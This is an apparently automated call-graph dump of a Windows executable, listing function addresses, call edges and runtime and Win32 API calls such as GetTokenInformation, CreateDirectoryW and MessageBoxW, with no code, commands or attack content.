7ff6dc71e172 17941->17942 17943 7ff6dc71e1ac 45 API calls 17941->17943 17942->17909 17943->17942 17945 7ff6dc7240ac 38 API calls 17944->17945 17946 7ff6dc71de3f 17945->17946 17947 7ff6dc723af4 37 API calls 17946->17947 17948 7ff6dc71de97 17947->17948 17949 7ff6dc71de9b 17948->17949 17950 7ff6dc71def0 45 API calls 17948->17950 17949->17909 17950->17949 17952 7ff6dc71daa1 17951->17952 17953 7ff6dc71dad4 17951->17953 17954 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 17952->17954 17955 7ff6dc71daec 17953->17955 17958 7ff6dc71db6d 17953->17958 17957 7ff6dc71dacd __scrt_get_show_window_mode 17954->17957 17956 7ff6dc71ddf4 46 API calls 17955->17956 17956->17957 17957->17909 17958->17957 17959 7ff6dc7147c0 45 API calls 17958->17959 17959->17957 17961 7ff6dc7240ff fegetenv 17960->17961 17962 7ff6dc727e2c 37 API calls 17961->17962 17968 7ff6dc724152 17962->17968 17963 7ff6dc72417f 17967 7ff6dc71a4a4 __std_exception_copy 37 API calls 17963->17967 17964 7ff6dc724242 17965 7ff6dc727e2c 37 API calls 17964->17965 17966 7ff6dc72426c 17965->17966 17971 7ff6dc727e2c 37 API calls 17966->17971 17972 7ff6dc7241fd 17967->17972 17968->17964 17969 7ff6dc72416d 17968->17969 17970 7ff6dc72421c 17968->17970 17969->17963 17969->17964 17975 7ff6dc71a4a4 __std_exception_copy 37 API calls 17970->17975 17973 7ff6dc72427d 17971->17973 17974 7ff6dc725324 17972->17974 17979 7ff6dc724205 17972->17979 17976 7ff6dc728020 20 API calls 17973->17976 17977 7ff6dc71a900 _isindst 17 API calls 17974->17977 17975->17972 17988 7ff6dc7242e6 __scrt_get_show_window_mode 17976->17988 17978 7ff6dc725339 17977->17978 17980 7ff6dc70c550 _log10_special 8 API calls 17979->17980 17981 7ff6dc71e351 17980->17981 18005 7ff6dc723af4 17981->18005 17982 7ff6dc724c6b memcpy_s __scrt_get_show_window_mode 17984 7ff6dc7249cf 17982->17984 17987 7ff6dc72497b 17982->17987 17997 7ff6dc714f08 11 API calls _set_fmode 17982->17997 18002 7ff6dc71a8e0 37 API calls _invalid_parameter_noinfo 17982->18002 17983 7ff6dc72468f __scrt_get_show_window_mode 17985 7ff6dc723c10 37 API calls 17984->17985 17990 7ff6dc7250e7 17985->17990 17986 7ff6dc724327 memcpy_s 17986->17982 17999 7ff6dc724783 memcpy_s __scrt_get_show_window_mode 17986->17999 17987->17984 17987->17987 17989 7ff6dc72533c memcpy_s 37 API calls 17987->17989 17988->17983 17988->17986 17991 7ff6dc714f08 _set_fmode 11 API calls 17988->17991 17989->17984 17990->17990 17995 7ff6dc72533c memcpy_s 37 API calls 17990->17995 18004 7ff6dc725142 17990->18004 17992 7ff6dc724760 17991->17992 17994 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 17992->17994 17993 7ff6dc7252c8 17996 7ff6dc727e2c 37 API calls 17993->17996 17994->17986 17995->18004 17996->17979 17997->17982 17998 7ff6dc714f08 11 API calls _set_fmode 17998->17999 17999->17987 17999->17998 18000 7ff6dc71a8e0 37 API calls _invalid_parameter_noinfo 17999->18000 18000->17999 18001 7ff6dc723c10 37 API calls 18001->18004 18002->17982 18003 7ff6dc72533c memcpy_s 37 API calls 18003->18004 18004->17993 18004->18001 18004->18003 18006 7ff6dc723b13 18005->18006 18007 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 18006->18007 18008 7ff6dc723b3e memcpy_s 18006->18008 18007->18008 18008->17931 18010 7ff6dc71e1d8 memcpy_s 18009->18010 18011 7ff6dc7147c0 45 API calls 18010->18011 18012 7ff6dc71e292 memcpy_s __scrt_get_show_window_mode 18010->18012 18011->18012 18012->17936 18014 7ff6dc71df2b 18013->18014 18017 7ff6dc71df78 memcpy_s 18013->18017 18015 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 18014->18015 18016 7ff6dc71df57 18015->18016 18016->17936 18018 7ff6dc71dfe3 18017->18018 18020 7ff6dc7147c0 45 API calls 18017->18020 18019 7ff6dc71a4a4 __std_exception_copy 37 API calls 18018->18019 18023 7ff6dc71e025 memcpy_s 18019->18023 18020->18018 18021 7ff6dc71a900 _isindst 17 API calls 18022 7ff6dc71e0d0 18021->18022 18023->18021 18025 7ff6dc710c4e 18024->18025 18026 7ff6dc710c5f 18024->18026 18025->17860 18026->18025 18027 7ff6dc71d5fc _fread_nolock 12 API calls 18026->18027 18028 7ff6dc710c90 18027->18028 18029 7ff6dc710ca4 18028->18029 18031 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18028->18031 18030 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18029->18030 18030->18025 18031->18029 18033 7ff6dc714766 18032->18033 18034 7ff6dc71476e 18032->18034 18035 7ff6dc7147c0 45 API calls 18033->18035 18034->17871 18035->18034 18037 7ff6dc7147ff 18036->18037 18038 7ff6dc71d9d1 18036->18038 18040 7ff6dc71da24 18037->18040 18038->18037 18039 7ff6dc723304 45 API calls 18038->18039 18039->18037 18041 7ff6dc71da3d 18040->18041 18042 7ff6dc71480f 18040->18042 18041->18042 18043 7ff6dc722650 45 API calls 18041->18043 18042->17793 18043->18042 18047 7ff6dc726d88 18044->18047 18049 7ff6dc726dec 18047->18049 18048 7ff6dc70c550 _log10_special 8 API calls 18050 7ff6dc7200bd 18048->18050 18049->18048 18050->17895 18052 7ff6dc710ffd 18051->18052 18053 7ff6dc71100f 18051->18053 18054 7ff6dc714f08 _set_fmode 11 API calls 18052->18054 18055 7ff6dc71101d 18053->18055 18060 7ff6dc711059 18053->18060 18056 7ff6dc711002 18054->18056 18057 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 18055->18057 18058 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 18056->18058 18065 7ff6dc71100d 18057->18065 18058->18065 18059 7ff6dc7113d5 18061 7ff6dc714f08 _set_fmode 11 API calls 18059->18061 18059->18065 18060->18059 18062 7ff6dc714f08 _set_fmode 11 API calls 18060->18062 18063 7ff6dc711669 18061->18063 18064 7ff6dc7113ca 18062->18064 18066 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 18063->18066 18067 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 18064->18067 18065->17757 18066->18065 18067->18059 18069 7ff6dc710704 18068->18069 18096 7ff6dc710464 18069->18096 18071 7ff6dc71071d 18071->17411 18108 7ff6dc7103bc 18072->18108 18076 7ff6dc70c850 18075->18076 18077 7ff6dc702930 GetCurrentProcessId 18076->18077 18078 7ff6dc701c80 49 API calls 18077->18078 18079 7ff6dc702979 18078->18079 18122 7ff6dc714984 18079->18122 18084 7ff6dc701c80 49 API calls 18085 7ff6dc7029ff 18084->18085 18152 7ff6dc702620 18085->18152 18088 7ff6dc70c550 _log10_special 8 API calls 18089 7ff6dc702a31 18088->18089 18089->17450 18091 7ff6dc710119 18090->18091 18092 7ff6dc701b89 18090->18092 18093 7ff6dc714f08 _set_fmode 11 API calls 18091->18093 18092->17449 18092->17450 18094 7ff6dc71011e 18093->18094 18095 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 18094->18095 18095->18092 18097 7ff6dc7104ce 18096->18097 18098 7ff6dc71048e 18096->18098 18097->18098 18100 7ff6dc7104da 18097->18100 18099 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 18098->18099 18101 7ff6dc7104b5 18099->18101 18107 7ff6dc71546c EnterCriticalSection 18100->18107 18101->18071 18109 7ff6dc7103e6 18108->18109 18110 7ff6dc701a20 18108->18110 18109->18110 18111 7ff6dc710432 18109->18111 18112 7ff6dc7103f5 __scrt_get_show_window_mode 18109->18112 18110->17419 18110->17420 18121 7ff6dc71546c EnterCriticalSection 18111->18121 18114 7ff6dc714f08 _set_fmode 11 API calls 18112->18114 18116 7ff6dc71040a 18114->18116 18118 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 18116->18118 18118->18110 18124 7ff6dc7149de 18122->18124 18123 7ff6dc714a03 18125 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 18123->18125 18124->18123 18126 7ff6dc714a3f 18124->18126 18128 7ff6dc714a2d 18125->18128 18161 7ff6dc712c10 18126->18161 18129 7ff6dc70c550 _log10_special 8 API calls 18128->18129 18131 7ff6dc7029c3 18129->18131 18130 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18130->18128 18140 7ff6dc715160 18131->18140 18133 7ff6dc714b40 18134 7ff6dc714b4a 18133->18134 18139 7ff6dc714b1c 18133->18139 18137 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18134->18137 18135 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18135->18128 18136 7ff6dc714ae8 18138 7ff6dc714af1 18136->18138 18136->18139 18137->18128 18138->18135 18139->18130 18141 7ff6dc71b2c8 _set_fmode 11 API calls 18140->18141 18142 7ff6dc715177 18141->18142 18143 7ff6dc7151b7 18142->18143 18144 7ff6dc71eb98 _set_fmode 11 API calls 18142->18144 18149 7ff6dc7029e5 18142->18149 18143->18149 18296 7ff6dc71ec20 18143->18296 18145 7ff6dc7151ac 18144->18145 18146 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18145->18146 18146->18143 18149->18084 18150 7ff6dc71a900 _isindst 17 API calls 18151 7ff6dc7151fc 18150->18151 18153 7ff6dc70262f 18152->18153 18154 7ff6dc709390 2 API calls 18153->18154 18155 7ff6dc702660 18154->18155 18156 7ff6dc702683 MessageBoxA 18155->18156 18157 7ff6dc70266f MessageBoxW 18155->18157 18158 7ff6dc702690 18156->18158 18157->18158 18159 7ff6dc70c550 _log10_special 8 API calls 18158->18159 18160 7ff6dc7026a0 18159->18160 18160->18088 18162 7ff6dc712c4e 18161->18162 18163 7ff6dc712c3e 18161->18163 18164 7ff6dc712c57 18162->18164 18168 7ff6dc712c85 18162->18168 18166 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 18163->18166 18167 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 18164->18167 18165 7ff6dc712c7d 18165->18133 18165->18136 18165->18138 18165->18139 18166->18165 18167->18165 18168->18163 18168->18165 18169 7ff6dc7147c0 45 API calls 18168->18169 18171 7ff6dc712f34 18168->18171 18175 7ff6dc7135a0 18168->18175 18201 7ff6dc713268 18168->18201 18231 7ff6dc712af0 18168->18231 18169->18168 18173 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 18171->18173 18173->18163 18176 7ff6dc7135e2 18175->18176 18177 7ff6dc713655 18175->18177 18180 7ff6dc7135e8 18176->18180 18181 7ff6dc71367f 18176->18181 18178 7ff6dc71365a 18177->18178 18179 7ff6dc7136af 18177->18179 18182 7ff6dc71365c 18178->18182 18183 7ff6dc71368f 18178->18183 18179->18181 18190 7ff6dc7136be 18179->18190 18192 7ff6dc713618 18179->18192 18188 7ff6dc7135ed 18180->18188 18180->18190 18248 7ff6dc711b50 18181->18248 18184 7ff6dc7135fd 18182->18184 18189 7ff6dc71366b 18182->18189 18255 7ff6dc711740 18183->18255 18200 7ff6dc7136ed 18184->18200 18234 7ff6dc713f04 18184->18234 18188->18184 18191 7ff6dc713630 18188->18191 18188->18192 18189->18181 18194 7ff6dc713670 18189->18194 18190->18200 18262 7ff6dc711f60 18190->18262 18191->18200 18244 7ff6dc7143c0 18191->18244 18192->18200 18269 7ff6dc71e858 18192->18269 18197 7ff6dc714558 37 API calls 18194->18197 18194->18200 18196 7ff6dc70c550 _log10_special 8 API calls 18198 7ff6dc713983 18196->18198 18197->18192 18198->18168 18200->18196 18202 7ff6dc713289 18201->18202 18203 7ff6dc713273 18201->18203 18204 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 18202->18204 18207 7ff6dc7132c7 18202->18207 18205 7ff6dc7135e2 18203->18205 18206 7ff6dc713655 18203->18206 18203->18207 18204->18207 18210 7ff6dc7135e8 18205->18210 18211 7ff6dc71367f 18205->18211 18208 7ff6dc71365a 18206->18208 18209 7ff6dc7136af 18206->18209 18207->18168 18212 7ff6dc71365c 18208->18212 18213 7ff6dc71368f 18208->18213 18209->18211 18219 7ff6dc7136be 18209->18219 18229 7ff6dc713618 18209->18229 18218 7ff6dc7135ed 18210->18218 18210->18219 18215 7ff6dc711b50 38 API calls 18211->18215 18214 7ff6dc7135fd 18212->18214 18222 7ff6dc71366b 18212->18222 18216 7ff6dc711740 38 API calls 18213->18216 18217 7ff6dc713f04 47 API calls 18214->18217 18230 7ff6dc7136ed 18214->18230 18215->18229 18216->18229 18217->18229 18218->18214 18220 7ff6dc713630 18218->18220 18218->18229 18221 7ff6dc711f60 38 API calls 18219->18221 18219->18230 18223 7ff6dc7143c0 47 API calls 18220->18223 18220->18230 18221->18229 18222->18211 18224 7ff6dc713670 18222->18224 18223->18229 18226 7ff6dc714558 37 API calls 18224->18226 18224->18230 18225 7ff6dc70c550 _log10_special 8 API calls 18227 7ff6dc713983 18225->18227 18226->18229 18227->18168 18228 7ff6dc71e858 47 API calls 18228->18229 18229->18228 18229->18230 18230->18225 18279 7ff6dc710d14 18231->18279 18235 7ff6dc713f26 18234->18235 18236 7ff6dc710b80 12 API calls 18235->18236 18237 7ff6dc713f6e 18236->18237 18238 7ff6dc71e570 46 API calls 18237->18238 18239 7ff6dc714041 18238->18239 18240 7ff6dc7147c0 45 API calls 18239->18240 18241 7ff6dc714063 18239->18241 18240->18241 18242 7ff6dc7147c0 45 API calls 18241->18242 18243 7ff6dc7140ec 18241->18243 18242->18243 18243->18192 18245 7ff6dc7143d8 18244->18245 18247 7ff6dc714440 18244->18247 18246 7ff6dc71e858 47 API calls 18245->18246 18245->18247 18246->18247 18247->18192 18249 7ff6dc711b83 18248->18249 18250 7ff6dc711bb2 18249->18250 18252 7ff6dc711c6f 18249->18252 18251 7ff6dc710b80 12 API calls 18250->18251 18254 7ff6dc711bef 18250->18254 18251->18254 18253 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 18252->18253 18253->18254 18254->18192 18257 7ff6dc711773 18255->18257 18256 7ff6dc7117a2 18258 7ff6dc710b80 12 API calls 18256->18258 18261 7ff6dc7117df 18256->18261 18257->18256 18259 7ff6dc71185f 18257->18259 18258->18261 18260 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 18259->18260 18260->18261 18261->18192 18263 7ff6dc711f93 18262->18263 18264 7ff6dc711fc2 18263->18264 18266 7ff6dc71207f 18263->18266 18265 7ff6dc710b80 12 API calls 18264->18265 18268 7ff6dc711fff 18264->18268 18265->18268 18267 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 18266->18267 18267->18268 18268->18192 18270 7ff6dc71e880 18269->18270 18271 7ff6dc71e8ae __scrt_get_show_window_mode 18270->18271 18272 7ff6dc71e8c5 18270->18272 18274 7ff6dc7147c0 45 API calls 18270->18274 18277 7ff6dc71e885 __scrt_get_show_window_mode 18270->18277 18273 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 18271->18273 18271->18277 18272->18271 18275 7ff6dc7207e8 WideCharToMultiByte 18272->18275 18272->18277 18273->18277 18274->18272 18276 7ff6dc71e9a1 18275->18276 18276->18277 18278 7ff6dc71e9b6 GetLastError 18276->18278 18277->18192 18278->18271 18278->18277 18280 7ff6dc710d41 18279->18280 18281 7ff6dc710d53 18279->18281 18282 7ff6dc714f08 _set_fmode 11 API calls 18280->18282 18283 7ff6dc710d60 18281->18283 18288 7ff6dc710d9d 18281->18288 18284 7ff6dc710d46 18282->18284 18285 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 18283->18285 18286 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 18284->18286 18287 7ff6dc710d51 18285->18287 18286->18287 18287->18168 18289 7ff6dc710e46 18288->18289 18290 7ff6dc714f08 _set_fmode 11 API calls 18288->18290 18289->18287 18291 7ff6dc714f08 _set_fmode 11 API calls 18289->18291 18292 7ff6dc710e3b 18290->18292 18293 7ff6dc710ef0 18291->18293 18294 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 18292->18294 18295 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 18293->18295 18294->18289 18295->18287 18300 7ff6dc71ec3d 18296->18300 18297 7ff6dc71ec42 18298 7ff6dc7151dd 18297->18298 18299 7ff6dc714f08 _set_fmode 11 API calls 18297->18299 18298->18149 18298->18150 18301 7ff6dc71ec4c 18299->18301 18300->18297 18300->18298 18303 7ff6dc71ec8c 18300->18303 18302 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 18301->18302 18302->18298 18303->18298 18304 7ff6dc714f08 _set_fmode 11 API calls 18303->18304 18304->18301 18306 7ff6dc718258 18305->18306 18307 7ff6dc718245 18305->18307 18315 7ff6dc717ebc 18306->18315 18308 7ff6dc714f08 _set_fmode 11 API calls 18307->18308 18310 7ff6dc71824a 18308->18310 18311 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 18310->18311 18313 7ff6dc718256 18311->18313 18313->17470 18322 7ff6dc7202d8 EnterCriticalSection 18315->18322 18324 7ff6dc7085b1 GetTokenInformation 18323->18324 18325 7ff6dc708633 __std_exception_destroy 18323->18325 18326 7ff6dc7085dd 18324->18326 18327 7ff6dc7085d2 GetLastError 18324->18327 18328 7ff6dc708646 CloseHandle 18325->18328 18329 7ff6dc70864c 18325->18329 18326->18325 18330 7ff6dc7085f9 GetTokenInformation 18326->18330 18327->18325 18327->18326 18328->18329 18329->17475 18330->18325 18331 7ff6dc70861c 18330->18331 18331->18325 18332 7ff6dc708626 ConvertSidToStringSidW 18331->18332 18332->18325 18334 7ff6dc70c850 18333->18334 18335 7ff6dc702b74 GetCurrentProcessId 18334->18335 18336 7ff6dc7026b0 48 API calls 18335->18336 18337 7ff6dc702bc7 18336->18337 18338 7ff6dc714bd8 48 API calls 18337->18338 18339 7ff6dc702c10 MessageBoxW 18338->18339 18340 7ff6dc70c550 _log10_special 8 API calls 18339->18340 18341 7ff6dc702c40 18340->18341 18341->17485 18343 7ff6dc7025e5 18342->18343 18344 7ff6dc714bd8 48 API calls 18343->18344 18345 7ff6dc702604 18344->18345 18345->17501 18381 7ff6dc718794 18346->18381 18350 7ff6dc7081dc 18349->18350 18351 7ff6dc709390 2 API calls 18350->18351 18352 7ff6dc7081fb 18351->18352 18353 7ff6dc708216 ExpandEnvironmentStringsW 18352->18353 18512 7ff6dc70456a 18511->18512 18513 7ff6dc709390 2 API calls 18512->18513 18514 7ff6dc70458f 18513->18514 18515 7ff6dc70c550 _log10_special 8 API calls 18514->18515 18516 7ff6dc7045b7 18515->18516 18516->17532 18518 7ff6dc707e2e 18517->18518 18519 7ff6dc707f52 18518->18519 18520 7ff6dc701c80 49 API calls 18518->18520 18521 7ff6dc70c550 _log10_special 8 API calls 18519->18521 18525 7ff6dc707eb5 18520->18525 18522 7ff6dc707f83 18521->18522 18522->17532 18523 7ff6dc701c80 49 API calls 18523->18525 18524 7ff6dc704560 10 API calls 18524->18525 18525->18519 18525->18523 18525->18524 18526 7ff6dc707f0b 18525->18526 18527 7ff6dc709390 2 API calls 18526->18527 18528 7ff6dc707f23 CreateDirectoryW 18527->18528 18528->18519 18528->18525 18530 7ff6dc701613 18529->18530 18531 7ff6dc701637 18529->18531 18650 7ff6dc701050 18530->18650 18533 7ff6dc7045c0 108 API calls 18531->18533 18535 7ff6dc70164b 18533->18535 18537 7ff6dc701653 18535->18537 18538 7ff6dc701682 18535->18538 18540 7ff6dc714f08 _set_fmode 11 API calls 18537->18540 18541 7ff6dc7045c0 108 API calls 18538->18541 18543 7ff6dc701658 18540->18543 18542 7ff6dc701696 18541->18542 18544 7ff6dc70169e 18542->18544 18545 7ff6dc7016b8 18542->18545 18546 7ff6dc702910 54 API calls 18543->18546 18579 7ff6dc70718b 18577->18579 18580 7ff6dc707144 18577->18580 18579->17532 18580->18579 18714 7ff6dc715024 18580->18714 18582 7ff6dc7041a1 18581->18582 18583 7ff6dc7044e0 49 API calls 18582->18583 18584 7ff6dc7041db 18583->18584 18585 7ff6dc7044e0 49 API calls 18584->18585 18586 7ff6dc7041eb 18585->18586 18587 7ff6dc70420d 18586->18587 18588 7ff6dc70423c 18586->18588 18626 7ff6dc701c80 49 API calls 18625->18626 18627 7ff6dc704474 18626->18627 18627->17532 18651 7ff6dc7045c0 108 API calls 18650->18651 18652 7ff6dc70108c 18651->18652 18653 7ff6dc701094 18652->18653 18654 7ff6dc7010a9 18652->18654 18656 7ff6dc702710 54 API calls 18653->18656 18655 7ff6dc7106d4 73 API calls 18654->18655 18662 7ff6dc7010a4 __std_exception_destroy 18656->18662 18715 7ff6dc71505e 18714->18715 18716 7ff6dc715031 18714->18716 18717 7ff6dc715081 18715->18717 18720 7ff6dc71509d 18715->18720 18718 7ff6dc714f08 _set_fmode 11 API calls 18716->18718 18723 7ff6dc714fe8 18716->18723 18719 7ff6dc714f08 _set_fmode 11 API calls 18717->18719 18721 7ff6dc71503b 18718->18721 18722 7ff6dc715086 18719->18722 18724 7ff6dc714f4c 45 API calls 18720->18724 18725 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 18721->18725 18726 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 18722->18726 18723->18580 18728 7ff6dc715091 18724->18728 18727 7ff6dc715046 18725->18727 18726->18728 18727->18580 18728->18580 18793 7ff6dc715ec8 18792->18793 18794 7ff6dc715eee 18793->18794 18797 7ff6dc715f21 18793->18797 18795 7ff6dc714f08 _set_fmode 11 API calls 18794->18795 18796 7ff6dc715ef3 18795->18796 18798 7ff6dc71a8e0 _invalid_parameter_noinfo 37 API calls 18796->18798 18799 7ff6dc715f27 18797->18799 18800 7ff6dc715f34 18797->18800 18801 7ff6dc704616 18798->18801 18802 7ff6dc714f08 _set_fmode 11 API calls 18799->18802 18811 7ff6dc71ac28 18800->18811 18801->17563 18802->18801 18824 7ff6dc7202d8 EnterCriticalSection 18811->18824 19184 7ff6dc7178f8 19183->19184 19187 7ff6dc7173d4 19184->19187 19186 7ff6dc717911 19186->17573 19188 7ff6dc71741e 19187->19188 19189 7ff6dc7173ef 19187->19189 19197 7ff6dc71546c EnterCriticalSection 19188->19197 19190 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 19189->19190 19192 7ff6dc71740f 19190->19192 19192->19186 19199 7ff6dc70fe71 19198->19199 19200 7ff6dc70fe43 19198->19200 19201 7ff6dc70fe63 19199->19201 19208 7ff6dc71546c EnterCriticalSection 19199->19208 19202 7ff6dc71a814 _invalid_parameter_noinfo 37 API calls 19200->19202 19201->17577 19202->19201 19210 7ff6dc7045c0 108 API calls 19209->19210 19211 7ff6dc701493 19210->19211 19212 7ff6dc7014bc 19211->19212 19213 7ff6dc70149b 19211->19213 19316 7ff6dc706375 19315->19316 19317 7ff6dc701c80 49 API calls 19316->19317 19318 7ff6dc7063b1 19317->19318 19319 7ff6dc7063dd 19318->19319 19320 7ff6dc7063ba 19318->19320 19322 7ff6dc704630 49 API calls 19319->19322 19321 7ff6dc702710 54 API calls 19320->19321 19338 7ff6dc7063d3 19321->19338 19323 7ff6dc7063f5 19322->19323 19327 7ff6dc70c550 _log10_special 8 API calls 19338->19327 19590 7ff6dc71b150 __CxxCallCatchBlock 45 API calls 19589->19590 19591 7ff6dc71a3e1 19590->19591 19592 7ff6dc71a504 __CxxCallCatchBlock 45 API calls 19591->19592 19593 7ff6dc71a401 19592->19593 16479 7ff6dc7208c8 16480 7ff6dc7208ec 16479->16480 16484 7ff6dc7208fc 16479->16484 16481 7ff6dc714f08 _set_fmode 11 API calls 16480->16481 16482 7ff6dc7208f1 16481->16482 16483 7ff6dc720bdc 16486 7ff6dc714f08 _set_fmode 11 API calls 16483->16486 16484->16483 16485 7ff6dc72091e 16484->16485 16487 7ff6dc72093f 16485->16487 16628 7ff6dc720f84 16485->16628 16488 7ff6dc720be1 16486->16488 16491 7ff6dc7209b1 16487->16491 16492 7ff6dc720965 16487->16492 16506 7ff6dc7209a5 16487->16506 16490 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16488->16490 16490->16482 16494 7ff6dc71eb98 _set_fmode 11 API calls 16491->16494 16504 7ff6dc720974 16491->16504 16643 7ff6dc7196c0 16492->16643 16497 7ff6dc7209c7 16494->16497 16496 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16496->16482 16500 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16497->16500 16499 7ff6dc720a7b 16505 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16499->16505 16508 7ff6dc7209d5 16500->16508 16501 7ff6dc72098d 16501->16506 16511 7ff6dc720f84 45 API calls 16501->16511 16502 7ff6dc72096f 16503 7ff6dc714f08 _set_fmode 11 API calls 16502->16503 16503->16504 16504->16496 16510 7ff6dc720a84 16505->16510 16506->16504 16507 7ff6dc720a5e 16506->16507 16649 7ff6dc72712c 16506->16649 16507->16499 16509 7ff6dc720acd 16507->16509 16508->16504 16508->16506 16513 7ff6dc71eb98 _set_fmode 11 API calls 16508->16513 16509->16504 16512 7ff6dc7233dc 40 API calls 16509->16512 16520 7ff6dc720a89 16510->16520 16685 7ff6dc7233dc 16510->16685 16511->16506 16514 7ff6dc720b0a 16512->16514 16515 7ff6dc7209f7 16513->16515 16516 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16514->16516 16518 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16515->16518 16519 7ff6dc720b14 16516->16519 16518->16506 16519->16504 16519->16520 16521 7ff6dc720bd0 16520->16521 16525 7ff6dc71eb98 _set_fmode 11 API calls 16520->16525 16523 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16521->16523 16522 7ff6dc720ab5 16524 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16522->16524 16523->16482 16524->16520 16526 7ff6dc720b58 16525->16526 16527 7ff6dc720b69 16526->16527 16528 7ff6dc720b60 16526->16528 16610 7ff6dc71a4a4 16527->16610 16529 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16528->16529 16531 7ff6dc720b67 16529->16531 16535 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16531->16535 16533 7ff6dc720c0b 16537 7ff6dc71a900 _isindst 17 API calls 16533->16537 16534 7ff6dc720b80 16694 7ff6dc727244 16534->16694 16535->16482 16539 7ff6dc720c1f 16537->16539 16540 7ff6dc720c48 16539->16540 16548 7ff6dc720c58 16539->16548 16543 7ff6dc714f08 _set_fmode 11 API calls 16540->16543 16541 7ff6dc720ba7 16545 7ff6dc714f08 _set_fmode 11 API calls 16541->16545 16542 7ff6dc720bc8 16544 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16542->16544 16572 7ff6dc720c4d 16543->16572 16544->16521 16546 7ff6dc720bac 16545->16546 16549 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16546->16549 16547 7ff6dc720f3b 16551 7ff6dc714f08 _set_fmode 11 API calls 16547->16551 16548->16547 16550 7ff6dc720c7a 16548->16550 16549->16531 16552 7ff6dc720c97 16550->16552 16713 7ff6dc72106c 16550->16713 16553 7ff6dc720f40 16551->16553 16556 7ff6dc720d0b 16552->16556 16558 7ff6dc720cbf 16552->16558 16565 7ff6dc720cff 16552->16565 16555 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16553->16555 16555->16572 16560 7ff6dc720d33 16556->16560 16566 7ff6dc71eb98 _set_fmode 11 API calls 16556->16566 16577 7ff6dc720cce 16556->16577 16557 7ff6dc720dbe 16570 7ff6dc720ddb 16557->16570 16578 7ff6dc720e2e 16557->16578 16728 7ff6dc7196fc 16558->16728 16563 7ff6dc71eb98 _set_fmode 11 API calls 16560->16563 16560->16565 16560->16577 16571 7ff6dc720d55 16563->16571 16564 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16564->16572 16565->16557 16565->16577 16734 7ff6dc726fec 16565->16734 16567 7ff6dc720d25 16566->16567 16573 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16567->16573 16568 7ff6dc720ce7 16568->16565 16580 7ff6dc72106c 45 API calls 16568->16580 16569 7ff6dc720cc9 16574 7ff6dc714f08 _set_fmode 11 API calls 16569->16574 16575 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16570->16575 16576 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16571->16576 16573->16560 16574->16577 16579 7ff6dc720de4 16575->16579 16576->16565 16577->16564 16578->16577 16581 7ff6dc7233dc 40 API calls 16578->16581 16584 7ff6dc7233dc 40 API calls 16579->16584 16586 7ff6dc720dea 16579->16586 16580->16565 16582 7ff6dc720e6c 16581->16582 16583 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16582->16583 16585 7ff6dc720e76 16583->16585 16588 7ff6dc720e16 16584->16588 16585->16577 16585->16586 16587 7ff6dc720f2f 16586->16587 16591 7ff6dc71eb98 _set_fmode 11 API calls 16586->16591 16589 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16587->16589 16590 7ff6dc71a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16588->16590 16589->16572 16590->16586 16592 7ff6dc720ebb 16591->16592 16593 7ff6dc720ecc 16592->16593 16594 7ff6dc720ec3 16592->16594 16619 7ff6dc720474 16593->16619 16595 